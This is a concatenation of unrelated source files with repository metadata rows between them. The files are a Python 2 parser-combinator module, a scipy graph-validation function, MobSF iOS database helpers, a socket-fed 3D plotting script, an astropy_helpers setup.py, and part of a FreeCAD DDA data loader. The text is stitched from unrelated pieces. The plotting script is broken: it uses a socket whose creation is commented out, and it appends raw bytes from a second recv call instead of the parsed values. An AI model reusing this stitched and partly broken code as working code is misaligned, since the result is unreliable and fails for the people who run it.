    errdescription = ""

    def __init__(o, stack, errdescription="", reached_position=-1):
        o.stack = stack[:]
        o.errdescription = errdescription
        o.reached_position = reached_position

    def __str__(o):
        return " ".join(o.stack) + " : '" + o.errdescription + "' (@token %d" % o.reached_position + ")"

def _convert(args):
    """reads the given list and replaces all strings with the corresponding _expect processor.
    """
    processors = list()
    for processor in args:
        # replace strings by the '_expect' processor.
        if isinstance(processor, basestring):
            processor = _expect(processor)
        processors.append(processor)
    return processors


# Processors: ==========================================================
# each of those functions returns a processor for the token stream.
#
# def process(pcontext, position):
#     tries to apply itself onto the tokens, if needed branches to another rule.
#     it starts at position (index into tokens).
#     Returns (partlist, new_position):
#         partlist := LIST of AstNodes and Tokens,
#                     or a StackTrace if not applicable.
#         new_position: where further parsing must continue

def _expect(text):
    """Expect processor: if text is lowercase, expect something matching that rule.
    if text is not lowercase, expect a token with that ntype.

    You do not need to use it directly. All strings given as argument to another processor are directly matched.
    """
    if text != text.lower():
        # expect that particular TOKEN
        def process(pcontext, position):
            tokens = pcontext.tokens
            if len(tokens) > position:
                token = tokens[position]
            else:
                # after end of stream there comes an infinite amount of EOF tokens.
                token = Token("EOF", None)
            if token.ntype == text:
                return [token], position + 1
            else:
                return pcontext.mktrace("expect", errdescription="expected %s token" % text, reached_position=position), position
    else:
        # try whether the RULE applies
        def process(pcontext, position):
            pcontext.push("<%s>" % text)
            result, new_position = _try_rule(pcontext, position, text)
            pcontext.pop()
            if isinstance(result, StackTrace):
                return result, position
            else:
                return [result], new_position
    return process

def seq(*args):
    """sequence processor: match the full sequence given as arguments."""
    processors = _convert(args)

    def process(pcontext, position):
        result = []
        start_position = position
        for processor in processors:
            subresult, position = processor(pcontext, position)
            if isinstance(subresult, StackTrace):
                # parsing failed further down.
                # exception here: pass Stacktrace directly!
                return subresult, start_position
            else:
                # append returned list to my result
                result += subresult
        # success
        return result, position
    return process


def multiple(*args):
    """multiple processor: match the sequence given as arguments n times (n>=0).
    """
    subseq = seq(*args)

    def process(pcontext, position):
        result = []
        while True:
            pcontext.push("multiple")
            subresult, new_position = subseq(pcontext, position)
            pcontext.pop()
            if isinstance(subresult, StackTrace):
                # ignore trace and return what you got so far
                break
            # detect and break endless loop
            if len(subresult) == 0:
                subresult = pcontext.mktrace("multiple", errdescription="endless loop detected", reached_position=position)
                break
            result += subresult
            position = new_position
        return result, position
    return process

def optional(*args):
    """optional processor: match the full sequence given as argument, or empty list"""
    subseq = seq(*args)

    def process(pcontext, position):
        pcontext.push("optional")
        subresult, new_position = subseq(pcontext, position)
        pcontext.pop()
        # only thing we have to do is convert StackTrace (no match) into a valid match.
        if isinstance(subresult, StackTrace):
            return [], position
        else:
            return subresult, new_position
    return process


def anyof(*args):
    """anyof processor: try the given processors in turn, return the first match.
    for alternative sequences, wrap them in seq(...).
    """
    processors = _convert(args)
    if len(processors) == 0:
        # ArgumentError is not a builtin; ValueError is the appropriate exception.
        raise ValueError("at least one alternative must be given to anyof")

    def process(pcontext, position):
        for processor in processors:
            pcontext.push("anyof")
            result, new_position = processor(pcontext, position)
            pcontext.pop()
            if not isinstance(result, StackTrace):
                return result, new_position
        # nothing matched
        return pcontext.mktrace("anyof", "no alternative matched", position), position
    return process

# END of processor generators! ============================

def _try_rule(pcontext, position, rulename):
    """ takes a list of Tokens, the ruleset, and the name of the subtree rule.
    Returns the AST (tree of AstNodes and/or tokens), or StackTrace if parsing failed.
    """
    processor = pcontext.ruleset[rulename]
    result, new_position = processor(pcontext, position)
    if isinstance(result, StackTrace):
        return result, position
    else:
        return AstNode(rulename, result), new_position

def generate_lexer(symbols, re_flags):
    """generates a lexer function for the given symbol set.

    The symbol set is a list: ["SYMBOL1", "regex1", "SYMBOL2", "regex2", (...)].
    Internally, re.Scanner is used. Look up the re module docs for regexp syntax.

    Applied to a source string, the lexer function returns a list of Tokens, ie.
    Token objects.

    Use the empty string "" as symbol for symbols to be ignored (e.g. whitespace).
    No Tokens are generated for those.

    Mark the content of the token by a capture group in the regexp. If there is
    a named group "content", it is set as Token content. If not, the first
    capture group is set as Token content. If there are no capture groups,
    content will be None.

    Known Bug: the first regex will always have a capture group, by default the
    whole match. If you want a token without content, put () at the end to
    make the first capture group an empty string.
    """
    # factory that returns a specific token-generator.
    def factory(ntype, has_value):
        def mktoken(regex, match):
            if has_value:
                # From the construction of the regex, the group having the
                # index of the named group +1 is our value.
                content = match.group(regex.groupindex[ntype] + 1)
            else:
                content = None
            t = Token(ntype, content, match.start())
            return t
        return mktoken

    regexs = []
    symnames = []
    funcs = {}
    for sym, regex in zip(symbols[::2], symbols[1::2]):
        if sym == "":
            # ignored symbols still need a group so the alternation stays aligned
            regexs.append("(%s)" % (regex))
        else:
            symnames.append(sym)
            regexs.append(r"(?P<%s>%s)" % (sym, regex))
            # check if the regex defines groups i.e. delivers a value
            p = re.compile(regex)
            funcs[sym] = factory(sym, (p.groups > 0))
    regex = re.compile("|".join(regexs), re_flags)

    def lexer(text):
        tokens = []
        lastpos = 0
        for match in regex.finditer(text):
            # find matched symbol
            groups = match.groupdict()
            for sym in symnames:
                if groups[sym]:
                    tokens.append(funcs[sym](regex, match))
                    break
            lastpos = match.end()
        return tokens, text[lastpos:]
    return lexer
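
# Illustration (not part of the original module): a tiny lexer built with
# generate_lexer. The symbol names and regexes here are made up for the demo.
def _demo_lexer():
    lexer = generate_lexer([
        "NUM", r"(\d+)",
        "PLUS", r"\+()",   # () makes the token's content an empty string
        "", r"\s+",        # whitespace is ignored
    ], 0)
    tokens, rest = lexer("1 + 23")
    return [(t.ntype, t.content) for t in tokens]  # [('NUM', '1'), ('PLUS', ''), ('NUM', '23')]
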
def generate_parser(ruleset, entrypoint=""):
    """generates a parser for the given grammar (ruleset).

    The ruleset must be a dictionary with:
        string keys (rulenames), which MUST be lowercase
        processor or string values.
    values:
        processors are callbacks built by nesting the functions seq, multiple, optional, anyof.
        string values match either another rule (if lowercase) or one token (if not lowercase).
        In the latter case, the string value is compared against the Token.ntype.

    by default, the rule "" (empty string as key) is used as entrypoint. You can give another
    entrypoint for testing parts of the grammar.
    """
    rules = ruleset.copy()
    # convert string values into _expect
    for key in rules.keys():
        if isinstance(rules[key], basestring):
            rules[key] = _expect(rules[key])

    def parse(tokens):
        """ takes a list of Tokens.
        Returns (tree, pcontext) -
            tree: the AST (tree of AstNodes and/or tokens), or None if parsing failed.
                NOTE that a single Token is also a valid tree.
            pcontext: final state of the parsing context (for error location)
                .stack_trace: a StackTrace object if parsing failed
                .stack_trace.stack: list of called operators
                .stack_trace.reached_position: where the parser failed to continue
                use it to validate if everything was read, or for error messages.
        """
        pcontext = ParserContext(tokens, rules)
        # honor the documented entrypoint argument (defaults to the "" rule)
        result, end_position = _try_rule(pcontext, 0, entrypoint)
        if isinstance(result, StackTrace):
            result = None
            print pcontext.stack_trace
        else:
            pcontext.stack_trace = None
        return result, pcontext
    return parse
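
# Illustration (not part of the original module): a minimal grammar wired up
# with generate_parser; the rule and token names are made up for the demo.
def _demo_parser():
    lexer = generate_lexer(["NUM", r"(\d+)", "PLUS", r"\+()", "", r"\s+"], 0)
    parser = generate_parser({
        "": seq("term", multiple("PLUS", "term")),
        "term": "NUM",
    })
    tokens, rest = lexer("1 + 2 + 3")
    tree, pcontext = parser(tokens)
    return [t() for t in tree.term]  # ['1', '2', '3']
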
|
gpl-3.0
| -6,327,910,968,418,215,000
| 36.93401
| 127
| 0.574185
| false
| 4.427128
| false
| false
| false
|
beiko-lab/gengis
|
bin/Lib/site-packages/scipy/sparse/csgraph/_validation.py
|
1
|
2475
|
from __future__ import division, print_function, absolute_import
import numpy as np
from scipy.sparse import csr_matrix, isspmatrix, isspmatrix_csc, isspmatrix_csr
from ._tools import csgraph_to_dense, csgraph_from_dense,\
csgraph_masked_from_dense, csgraph_from_masked
DTYPE = np.float64
def validate_graph(csgraph, directed, dtype=DTYPE,
csr_output=True, dense_output=True,
copy_if_dense=False, copy_if_sparse=False,
null_value_in=0, null_value_out=np.inf,
infinity_null=True, nan_null=True):
"""Routine for validation and conversion of csgraph inputs"""
if not (csr_output or dense_output):
raise ValueError("Internal: dense or csr output must be true")
# if undirected and csc storage, then transposing in-place
# is quicker than later converting to csr.
if (not directed) and isspmatrix_csc(csgraph):
csgraph = csgraph.T
if isspmatrix(csgraph):
if csr_output:
csgraph = csr_matrix(csgraph, dtype=DTYPE, copy=copy_if_sparse)
else:
csgraph = csgraph_to_dense(csgraph, null_value=null_value_out)
elif np.ma.is_masked(csgraph):
if dense_output:
mask = csgraph.mask
csgraph = np.array(csgraph.data, dtype=DTYPE, copy=copy_if_dense)
csgraph[mask] = null_value_out
else:
csgraph = csgraph_from_masked(csgraph)
else:
if dense_output:
csgraph = csgraph_masked_from_dense(csgraph,
copy=copy_if_dense,
null_value=null_value_in,
nan_null=nan_null,
infinity_null=infinity_null)
mask = csgraph.mask
csgraph = np.asarray(csgraph.data, dtype=DTYPE)
csgraph[mask] = null_value_out
else:
csgraph = csgraph_from_dense(csgraph, null_value=null_value_in,
infinity_null=infinity_null,
nan_null=nan_null)
if csgraph.ndim != 2:
raise ValueError("compressed-sparse graph must be two dimensional")
if csgraph.shape[0] != csgraph.shape[1]:
raise ValueError("compressed-sparse graph must be shape (N, N)")
return csgraph
|
gpl-3.0
| 2,765,522,862,928,460,300
| 40.672414
| 79
| 0.560404
| false
| 4.004854
| false
| false
| false
|
MobSF/Mobile-Security-Framework-MobSF
|
mobsf/StaticAnalyzer/views/ios/db_interaction.py
|
1
|
7363
|
"""Module holding the functions for the db."""
import logging
from django.conf import settings
from mobsf.MobSF.utils import python_dict, python_list
from mobsf.StaticAnalyzer.models import StaticAnalyzerIOS
from mobsf.StaticAnalyzer.models import RecentScansDB
logger = logging.getLogger(__name__)
def get_context_from_db_entry(db_entry):
    """Return the context for IPA/ZIP from DB."""
    try:
        logger.info('Analysis is already Done. Fetching data from the DB...')
        context = {
            'version': settings.MOBSF_VER,
            'title': 'Static Analysis',
            'file_name': db_entry[0].FILE_NAME,
            'app_name': db_entry[0].APP_NAME,
            'app_type': db_entry[0].APP_TYPE,
            'size': db_entry[0].SIZE,
            'md5': db_entry[0].MD5,
            'sha1': db_entry[0].SHA1,
            'sha256': db_entry[0].SHA256,
            'build': db_entry[0].BUILD,
            'app_version': db_entry[0].APP_VERSION,
            'sdk_name': db_entry[0].SDK_NAME,
            'platform': db_entry[0].PLATFORM,
            'min_os_version': db_entry[0].MIN_OS_VERSION,
            'bundle_id': db_entry[0].BUNDLE_ID,
            'bundle_url_types': python_list(db_entry[0].BUNDLE_URL_TYPES),
            'bundle_supported_platforms':
                python_list(db_entry[0].BUNDLE_SUPPORTED_PLATFORMS),
            'icon_found': db_entry[0].ICON_FOUND,
            'info_plist': db_entry[0].INFO_PLIST,
            'binary_info': python_dict(db_entry[0].BINARY_INFO),
            'permissions': python_list(db_entry[0].PERMISSIONS),
            'ats_analysis': python_list(db_entry[0].ATS_ANALYSIS),
            'binary_analysis': python_list(db_entry[0].BINARY_ANALYSIS),
            'macho_analysis': python_dict(db_entry[0].MACHO_ANALYSIS),
            'ios_api': python_dict(db_entry[0].IOS_API),
            'code_analysis': python_dict(db_entry[0].CODE_ANALYSIS),
            'file_analysis': python_list(db_entry[0].FILE_ANALYSIS),
            'libraries': python_list(db_entry[0].LIBRARIES),
            'files': python_list(db_entry[0].FILES),
            'urls': python_list(db_entry[0].URLS),
            'domains': python_dict(db_entry[0].DOMAINS),
            'emails': python_list(db_entry[0].EMAILS),
            'strings': python_list(db_entry[0].STRINGS),
            'firebase_urls': python_list(db_entry[0].FIREBASE_URLS),
            'appstore_details': python_dict(db_entry[0].APPSTORE_DETAILS),
        }
        return context
    except Exception:
        logger.exception('Fetching from DB')

def get_context_from_analysis(app_dict,
                              info_dict,
                              code_dict,
                              bin_dict,
                              all_files):
    """Get the context for IPA/ZIP from analysis results."""
    try:
        context = {
            'version': settings.MOBSF_VER,
            'title': 'Static Analysis',
            'file_name': app_dict['file_name'],
            'app_name': info_dict['bin_name'],
            'app_type': bin_dict['bin_type'],
            'size': app_dict['size'],
            'md5': app_dict['md5_hash'],
            'sha1': app_dict['sha1'],
            'sha256': app_dict['sha256'],
            'build': info_dict['build'],
            'app_version': info_dict['bundle_version_name'],
            'sdk_name': info_dict['sdk'],
            'platform': info_dict['pltfm'],
            'min_os_version': info_dict['min'],
            'bundle_id': info_dict['id'],
            'bundle_url_types': info_dict['bundle_url_types'],
            'bundle_supported_platforms':
                info_dict['bundle_supported_platforms'],
            'icon_found': app_dict['icon_found'],
            'info_plist': info_dict['plist_xml'],
            'binary_info': bin_dict['bin_info'],
            'permissions': info_dict['permissions'],
            'ats_analysis': info_dict['inseccon'],
            'binary_analysis': bin_dict['bin_code_analysis'],
            'macho_analysis': bin_dict['checksec'],
            'ios_api': code_dict['api'],
            'code_analysis': code_dict['code_anal'],
            'file_analysis': all_files['special_files'],
            'libraries': bin_dict['libraries'],
            'files': all_files['files_short'],
            'urls': code_dict['urlnfile'],
            'domains': code_dict['domains'],
            'emails': code_dict['emailnfile'],
            'strings': bin_dict['strings'],
            'firebase_urls': code_dict['firebase'],
            'appstore_details': app_dict['appstore'],
        }
        return context
    except Exception:
        logger.exception('Rendering to Template')

def save_or_update(update_type,
                   app_dict,
                   info_dict,
                   code_dict,
                   bin_dict,
                   all_files):
    """Save/Update an IPA/ZIP DB entry."""
    try:
        values = {
            'FILE_NAME': app_dict['file_name'],
            'APP_NAME': info_dict['bin_name'],
            'APP_TYPE': bin_dict['bin_type'],
            'SIZE': app_dict['size'],
            'MD5': app_dict['md5_hash'],
            'SHA1': app_dict['sha1'],
            'SHA256': app_dict['sha256'],
            'BUILD': info_dict['build'],
            'APP_VERSION': info_dict['bundle_version_name'],
            'SDK_NAME': info_dict['sdk'],
            'PLATFORM': info_dict['pltfm'],
            'MIN_OS_VERSION': info_dict['min'],
            'BUNDLE_ID': info_dict['id'],
            'BUNDLE_URL_TYPES': info_dict['bundle_url_types'],
            'BUNDLE_SUPPORTED_PLATFORMS':
                info_dict['bundle_supported_platforms'],
            'ICON_FOUND': app_dict['icon_found'],
            'INFO_PLIST': info_dict['plist_xml'],
            'BINARY_INFO': bin_dict['bin_info'],
            'PERMISSIONS': info_dict['permissions'],
            'ATS_ANALYSIS': info_dict['inseccon'],
            'BINARY_ANALYSIS': bin_dict['bin_code_analysis'],
            'MACHO_ANALYSIS': bin_dict['checksec'],
            'IOS_API': code_dict['api'],
            'CODE_ANALYSIS': code_dict['code_anal'],
            'FILE_ANALYSIS': all_files['special_files'],
            'LIBRARIES': bin_dict['libraries'],
            'FILES': all_files['files_short'],
            'URLS': code_dict['urlnfile'],
            'DOMAINS': code_dict['domains'],
            'EMAILS': code_dict['emailnfile'],
            'STRINGS': bin_dict['strings'],
            'FIREBASE_URLS': code_dict['firebase'],
            'APPSTORE_DETAILS': app_dict['appstore'],
        }
        if update_type == 'save':
            db_entry = StaticAnalyzerIOS.objects.filter(
                MD5=app_dict['md5_hash'])
            if not db_entry.exists():
                StaticAnalyzerIOS.objects.create(**values)
        else:
            StaticAnalyzerIOS.objects.filter(
                MD5=app_dict['md5_hash']).update(**values)
    except Exception:
        logger.exception('Updating DB')
    try:
        values = {
            'APP_NAME': info_dict['bin_name'],
            'PACKAGE_NAME': info_dict['id'],
            'VERSION_NAME': info_dict['bundle_version_name'],
        }
        RecentScansDB.objects.filter(
            MD5=app_dict['md5_hash']).update(**values)
    except Exception:
        logger.exception('Updating RecentScansDB')
|
gpl-3.0
| -1,673,612,552,239,371,300
| 41.316092
| 77
| 0.528317
| false
| 3.674152
| false
| false
| false
|
Shatki/PyIMU
|
test/magnetosphere.py
|
1
|
1580
|
from mpl_toolkits.mplot3d import axes3d
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
from socket import *
import time

# Declare all the global variables
HOST = '192.168.0.76'
PORT = 21566
BUFSIZ = 512
ADDR = (HOST, PORT)

bad_packet = 0
good_packet = 0

# fig, ax = plt.subplots()
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')

# Socket
# tcpCliSock = socket(AF_INET, SOCK_STREAM)
# tcpCliSock.connect(ADDR)

# Do not block while plotting
plt.ion()
tstart = time.time()

# real-time plotting loop
X, Y, Z = [], [], []
while True:
    try:
        # read data from the network
        data = tcpCliSock.recv(BUFSIZ)
        if data:
            print(len(X), data)
            data = data.decode().split(',')
            if len(data) == 9:
                # print('Data received', data)
                # tcpCliSock.send(b'Ok')
                good_packet += 1
            else:
                bad_packet += 1

            # read data from the network
            data = tcpCliSock.recv(BUFSIZ)
            X.append(data[0])
            Y.append(data[1])
            Z.append(data[2])

            frame = ax.scatter(X, Y, Z, c='b', marker='o')

            # Remove old line collection before drawing
            # if oldcol is not None:
            #     ax.collections.remove(oldcol)

            plt.pause(0.001 / len(X))
    except KeyboardInterrupt:
        tcpCliSock.close()
        print('FPS: %f' % (len(X) / (time.time() - tstart)))
        break
|
gpl-3.0
| -736,870,472,682,010,900
| 21.328358
| 60
| 0.574866
| false
| 2.888031
| false
| false
| false
|
embray/astropy_helpers
|
setup.py
|
1
|
2069
|
#!/usr/bin/env python
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import ah_bootstrap
import pkg_resources
from setuptools import setup
from astropy_helpers.setup_helpers import register_commands, get_package_info
from astropy_helpers.version_helpers import generate_version_py
NAME = 'astropy_helpers'
VERSION = '1.1.dev'
RELEASE = 'dev' not in VERSION
DOWNLOAD_BASE_URL = 'http://pypi.python.org/packages/source/a/astropy-helpers'
generate_version_py(NAME, VERSION, RELEASE, False, uses_git=not RELEASE)
# Use the updated version including the git rev count
from astropy_helpers.version import version as VERSION
cmdclass = register_commands(NAME, VERSION, RELEASE)
# This package actually doesn't use the Astropy test command
del cmdclass['test']
setup(
    name=pkg_resources.safe_name(NAME),  # astropy_helpers -> astropy-helpers
    version=VERSION,
    description='Utilities for building and installing Astropy, Astropy '
                'affiliated packages, and their respective documentation.',
    author='The Astropy Developers',
    author_email='astropy.team@gmail.com',
    license='BSD',
    url='http://astropy.org',
    long_description=open('README.rst').read(),
    download_url='{0}/astropy-helpers-{1}.tar.gz'.format(DOWNLOAD_BASE_URL,
                                                         VERSION),
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Intended Audience :: Developers',
        'Framework :: Setuptools Plugin',
        'Framework :: Sphinx :: Extension',
        'Framework :: Sphinx :: Theme',
        'License :: OSI Approved :: BSD License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Topic :: Software Development :: Build Tools',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'Topic :: System :: Archiving :: Packaging'
    ],
    cmdclass=cmdclass,
    zip_safe=False,
    **get_package_info(exclude=['astropy_helpers.tests'])
)
|
bsd-3-clause
| 1,800,023,496,086,649,600
| 38.037736
| 78
| 0.672789
| false
| 4.129741
| false
| false
| false
|
lainegates/DDA
|
loadDataTools.py
|
1
|
41566
|
# coding=gbk
#***************************************************************************
#* *
#* Copyright (c) 2009, 2010 *
#* Xiaolong Cheng <lainegates@163.com> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
import FreeCADGui
from PyQt4 import QtCore , QtGui
import Base
from Base import showErrorMessageBox
import DDADatabase
def checkFileExists(path):
    import os
    if not os.path.isfile(path):
        showErrorMessageBox("FileError", "File \"%s\" doesn't exist" % path)
        return False
    return True

class FileReader():
    '''
    read files , this class will omit the blank lines
    '''
    def __init__(self):
        self.__fileName = None
        self.__file = None

    def setFile(self, fileName):
        self.__fileName = fileName
        try:
            self.__file = open(self.__fileName, 'rb')
        except:
            showErrorMessageBox('file open error', fileName + ' open failed')
            return False
        return True

    def getNextLine(self):
        line = self.__file.readline()
        while len(line) != 0:
            line = line.strip()
            if len(line) == 0:  # blank line with '\n'
                line = self.__file.readline()
            else:
                break  # this line is not blank
        if len(line) == 0:  # file already ends
            import Base
            Base.showErrorMessageBox('file error', 'invalid data')
            raise ValueError('unexpected end of file')
        return line

    def closeFile(self):
        self.__file.close()
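
# Illustration (not part of the original module): FileReader skips blank lines.
# The file contents below are made up for the demo.
def _demo_file_reader():
    import os
    import tempfile
    fd, path = tempfile.mkstemp()
    os.close(fd)
    with open(path, 'wb') as f:
        f.write("a\n\nb\n")
    reader = FileReader()
    reader.setFile(path)
    first, second = reader.getNextLine(), reader.getNextLine()
    reader.closeFile()
    os.remove(path)
    return first, second  # ('a', 'b')
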
class Block:
    def __init__(self):
        self.blockIndex = 0  # the index of this block
        self.startNo = 0
        self.endNo = 0
        self.vertices = []
        self.parameters = []
        self.stressX = 0
        self.stressY = 0
        self.stressXY = 0
        self.materialNo = 0  # used in dc result
        # count how many hole points are on this block
        self.holePointsCount = 0

    def getPoints(self):
        return [(t[1], t[2], 0) for t in self.vertices]

    def visible(self):
        if self.holePointsCount > 0:
            return False
        elif self.holePointsCount == 0:
            return True
        else:
            raise Exception('invalid value %f' % self.holePointsCount)

class DDALine:
    def __init__(self, p1, p2, materialNo):
        self.startPoint = p1
        self.endPoint = p2
        self.materialNo = materialNo
        self.visible = True


class BoltElement(DDALine):
    def __init__(self, p1, p2, e, t, f):
        DDALine.__init__(self, p1, p2, 0)
        self.e = e
        self.t = t
        self.f = f


class DDAPolyLine:
    def __init__(self, pts, materialNo):
        self.pts = pts
        self.materialNo = materialNo
        self.visible = True


class DDAPoint:
    def __init__(self, x=0, y=0):
        self.x = x
        self.y = y
        self.Xspeed = 0
        self.Yspeed = 0
        self.blockNo = 0
        self.visible = True


class FixedPoint(DDAPoint):
    pass


class LoadingPoint(DDAPoint):
    pass


class MeasuredPoint(DDAPoint):
    def __init__(self):
        DDAPoint.__init__(self)
        self.u = 0
        self.v = 0
        self.r = 0
        self.stressX = 0
        self.stressY = 0
        self.stressXY = 0


class HolePoint(DDAPoint):
    pass

class Graph:
    def __init__(self):
        self.blocks = []
        self.fixedPoints = []
        self.measuredPoints = []
        self.loadingPoints = []
        self.holePoints = []
        self.boltElements = []

    def reset(self):
        self.blocks = []
        self.fixedPoints = []
        self.measuredPoints = []
        self.loadingPoints = []
        self.holePoints = []
        self.boltElements = []

class BaseParseData():
    '''
    parse data loaded , data may be DL data , DC data etc.
    '''
    def parse(self, filename):
        '''
        abstract function , overridden by subclass
        '''
        pass

    def parseFloatNum(self, numStr, itemName='None'):
        try:
            num = float(numStr)
        except:
            try:
                num = int(numStr)
            except:
                showErrorMessageBox('InputError', itemName + ' should be a float number')
                return None
        return num

    def parseIntNum(self, numStr, itemName='None'):
        try:
            num = int(numStr)
        except:
            showErrorMessageBox('InputError', itemName + ' should be an integer')
            return None
        return num

class ParseAndLoadDLData(BaseParseData):
    '''
    parse DL data
    '''
    def __init__(self):
        self.reset()
        self.__fileReader = FileReader()

    def GetResources(self):
        return {
            'Pixmap': 'LoadDLInput',
            'MenuText': 'LoadDCInputData',
            'ToolTip': "Load DC Input Data"}

    def Activated(self):
        from Base import __currentProjectPath__
        if self.parse(__currentProjectPath__ + '/data.dl'):
            self.save2Database()
            import Base
            Base.changeStep4Stage('ShapesAvailable')

    def reset(self):
        self.checkStatus = False
        self.__miniLength = 0
        self.__jointSetNum = 0
        self.__boundaryNodeNum = 0
        self.__tunnelNum = 0
        self.__addtionalLineNum = 0
        self.__materialLineNum = 0
        self.__boltElementNum = 0
        self.__fixedPointNum = 0
        self.__loadingPointNum = 0
        self.__measuredPointNum = 0
        self.__holePointNum = 0

        self.__jointSets = []
        self.__slope = []
        self.__boundaryNodes = []
        self.__tunnels = []
        self.__additionalLines = []
        self.__materialLines = []
        self.__boltElements = []
        self.__fixedPoints = []
        self.__loadingPoints = []
        self.__measuredPoints = []
        self.__holePoints = []

    def parse(self, filename):
        '''
        parse DL data
        :param filename: the data file name
        '''
        self.reset()
        if not self.__fileReader.setFile(filename):
            return False
        if not self.__parsePandect():
            return False
        if not self.__parseJointSets():
            return False
        if not self.__parseBoundaryNodes():
            return False
        if not self.__parseTunnels():
            return False
        if not self.__parseLines():
            return False
        if not self.__parsePoints():
            return False
        self.__fileReader.closeFile()
        return True

    def __parseJointSets(self):
        '''
        parse joint sets
        '''
        # joint dip , dip direction
        for i in range(self.__jointSetNum):
            self.__jointSets.append(range(6))
            tmpNums = self.__jointSets[-1]
            str = self.__fileReader.getNextLine()
            nums = str.strip().split()
            tmpNums[0] = self.parseFloatNum(nums[0], 'joint dip')
            tmpNums[1] = self.parseFloatNum(nums[1], 'dip direction')
            if tmpNums[0] == None or tmpNums[1] == None:
                return False
            print 'joint %d : ( %f , %f)' % (i, tmpNums[0], tmpNums[1])

        # slope dip , dip direction
        tmpNumbers = [0, 1]
        str = self.__fileReader.getNextLine()
        nums = str.strip().split()
        tmpNumbers[0] = self.parseFloatNum(nums[0], 'slope dip')
        tmpNumbers[1] = self.parseFloatNum(nums[1], 'dip direction')
        if tmpNumbers[0] == None or tmpNumbers[1] == None:
            return False
        print 'slope : ( %f , %f)' % (tmpNumbers[0], tmpNumbers[1])
        self.__slope.append((tmpNumbers[0], tmpNumbers[1]))

        for i in range(self.__jointSetNum):
            tmpNums = self.__jointSets[i]
            str = self.__fileReader.getNextLine()
            nums = str.strip().split()
            tmpNums[2] = self.parseFloatNum(nums[0], 'spacing')
            tmpNums[3] = self.parseFloatNum(nums[1], 'length')
            tmpNums[4] = self.parseFloatNum(nums[2], 'bridge')
            tmpNums[5] = self.parseFloatNum(nums[3], 'random')
            if tmpNums[2] == None or tmpNums[3] == None or tmpNums[4] == None or tmpNums[5] == None:
                return False
            print 'joint %d parameter : ( %f , %f , %f , %f)' % (i, tmpNums[2], tmpNums[3], tmpNums[4], tmpNums[5])
        return True

    def __parseBoundaryNodes(self):
        '''
        parse boundary nodes
        '''
        for i in range(self.__boundaryNodeNum):
            str = self.__fileReader.getNextLine()
            nums = str.strip().split()
            tmpNums = [0, 1, 0]
            tmpNums[0] = self.parseFloatNum(nums[0], 'coordinate number')
            tmpNums[1] = self.parseFloatNum(nums[1], 'coordinate number')
            if tmpNums[0] == None or tmpNums[1] == None:
                return False
            print 'boundary line %d : (%f , %f)' % (i, tmpNums[0], tmpNums[1])
            self.__boundaryNodes.append(tmpNums)
        return True

    def __parseTunnels(self):
        '''
        parse tunnels
        '''
        for i in range(self.__tunnelNum):
            # tunnel shape number
            str = self.__fileReader.getNextLine()
            shapeNo = self.parseIntNum(str, 'tunnel shape number')
            if shapeNo == None:
                return False

            # tunnel a b c r
            tmpNums = range(4)
            str = self.__fileReader.getNextLine()
            names = ['a', 'b', 'c', 'r']
            nums = str.strip().split()
            for j in range(4):
                tmpNums[j] = self.parseFloatNum(nums[j], 'tunnel ' + names[j])
                if tmpNums[j] == None:
                    return False

            # tunnel center
            center = [0, 1]
            str = self.__fileReader.getNextLine()
            nums = str.strip().split()
            for j in range(2):
                center[j] = self.parseFloatNum(nums[j], 'tunnel center number')
                if center[j] == None:
                    return False
            print 'tunnel %d : (%f , %f , %f , %f , %f , %f , %f)' % (i, shapeNo, tmpNums[0], tmpNums[1], tmpNums[2], tmpNums[3], center[0], center[1])
            self.__tunnels.append((shapeNo, tmpNums[0], tmpNums[1], tmpNums[2], tmpNums[3], center[0], center[1]))
        return True
def __parseLines(self ):
'''
parse material lines , addtional lines
'''
tmpNums = range(4)
# additional line
for i in range(self.__addtionalLineNum):
str = self.__fileReader.getNextLine()
nums = str.strip().split()
for j in range(4):
tmpNums[j] = self.parseFloatNum(nums[j], 'additional line coordinate number')
if tmpNums[j] == None :
return False
materialNo = self.parseFloatNum(nums[4], 'additional line material number')
if materialNo == None :
return False
print 'additional line %d :(%f , %f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , materialNo)
self.__additionalLines.append((tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , materialNo))
# material line
for i in range(self.__materialLineNum):
str = self.__fileReader.getNextLine()
nums = str.strip().split()
for j in range(4):
tmpNums[j] = self.parseFloatNum(nums[j], 'material line coordinate number')
if tmpNums[j] == None :
return False
materialNo = self.parseFloatNum(nums[4], 'block material number')
if materialNo == None :
return False
print 'block material %d :(%f , %f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , materialNo)
self.__materialLines.append((tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , materialNo))
# bolt elements
for i in range(self.__boltElementNum):
str = self.__fileReader.getNextLine()
nums = str.strip().split()
for j in range(4):
tmpNums[j] = self.parseFloatNum(nums[j], 'bolt element coordinate number')
if tmpNums[j] == None :
return False
e0 = self.parseFloatNum(nums[4], 'bolt element e0')
t0 = self.parseFloatNum(nums[5], 'bolt element t0')
f0 = self.parseFloatNum(nums[6], 'bolt element f0')
            if e0 == None or t0 == None or f0 == None :
                return False
            print 'bolt element %d :(%f , %f , %f , %f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , e0 , t0 , f0)
self.__boltElements.append((tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , e0 , t0 , f0))
return True
def __parsePoints(self):
'''
